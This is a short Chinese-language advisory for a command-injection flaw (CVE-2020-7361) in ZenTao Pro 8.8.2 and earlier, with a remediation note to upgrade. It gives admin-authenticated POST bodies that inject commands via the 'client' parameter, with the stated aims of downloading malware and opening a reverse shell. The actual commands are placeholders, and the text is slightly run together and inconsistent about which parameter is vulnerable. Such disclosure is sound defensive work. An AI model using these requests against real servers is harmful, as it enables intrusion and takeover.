禅道项目管理软件Pro版本任意命令执行漏洞
- CNNVD编号:未知
- 危害等级: 高危
- CVE编号:CVE-2020-7361
- 漏洞类型: 命令执行
- 威胁类型:未知
- 厂 商:未知
- 漏洞来源:深信服
- 发布时间:2020-12-22
- 更新时间:2021-01-14
漏洞简介
EasyCorp ZenTao Pro是一套开源项目管理软件。该软件包括产品管理、项目管理、质量管理和文档管理等功能。EasyCorp ZenTao Pro 8.8.2及之前版本中的/pro/repo-create.html文件存在操作系统命令注入漏洞。攻击者可借助‘path’参数利用该漏洞以SYSTEM权限执行任意命令。
漏洞公示
0x0:首先登陆到管理员账户。
0x1:通过/repo-create.html(/index.php?m=repo&f=create)页面下的client参数执行系统命令,将恶意软件下载到服务器中。
SCM=Git&name=test2&path=C%3A%5CProgramData&encoding=utf-8&client=cmd10x2:通过repo-create.html页面下的client参数执行系统命令,使用反弹shell,以达到getshell的目的。
SCM=Git&name=test2&path=C%3A%5CProgramData&encoding=utf-8&client=cmd2参考网站
暂无
受影响实体
禅道 Pro <= 8.8.2
补丁
建议受影响的用户升级至ZenTao pro 8.8.2以上版本,下载地址:https://www.zentao.net/download.html
